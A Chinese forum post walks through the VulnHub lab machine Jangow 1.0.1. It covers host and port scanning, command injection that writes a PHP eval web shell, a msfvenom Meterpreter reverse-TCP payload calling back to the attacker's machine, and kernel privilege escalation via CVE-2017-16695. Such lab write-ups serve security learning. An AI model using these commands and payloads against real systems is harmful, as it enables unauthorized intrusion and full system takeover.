电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 1247 人浏览分享

vulnhub系列2——Jangow: 1.0.1

[复制链接]
1247 0
前言:

习惯事与愿违。

vulnhub打靶系列文章

本次文章只用于技术讨论,学习,切勿用于非法用途,用于非法用途与本人无关!

所有环境均为在线下载的靶场,且在本机进行学习。

一、信息收集

首先进行主机的存活探测

netdiscover -r 192.168.56.0/24

QQ截图20221216152709.png

之后对其进行端口扫描

nmap -sV -Pn -sC 192.168.56.118

39.png

二、反弹shell提权

在网页上发现其一处可有命令执行

QQ截图20221216152824.png

对其进行一句话的写入,使用蚁剑连接

http://192.168.56.118/site/busque.php?buscar=echo '<?=@eval($_POST[1]);' >a.php

38.png

其权限很低

36.png

我们上传辅助提权工具,进行探测

33.png

但是在蚁剑上都提权失败,查询生成一个php马,将会话发送到msf上。通过蚁剑上传然后浏览器执行。

(这里不知道为啥只有443端口可以反弹成功。。。在这一步疑惑了很久)

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.105 lport=443 -f raw -o shell.php

28.png

调用交互shell

python3 -c "import pty;pty.spawn('/bin/bash');"

26.png

之后对其进行提权就成功了,使用CVE-2017-16695提权成功

22.png

您需要登录后才可以回帖 登录 | 注册

本版积分规则

1

关注

0

粉丝

9021

主题
精彩推荐
热门资讯
网友晒图
图文推荐

Powered by Pcgho! X3.4

© 2008-2022 Pcgho Inc.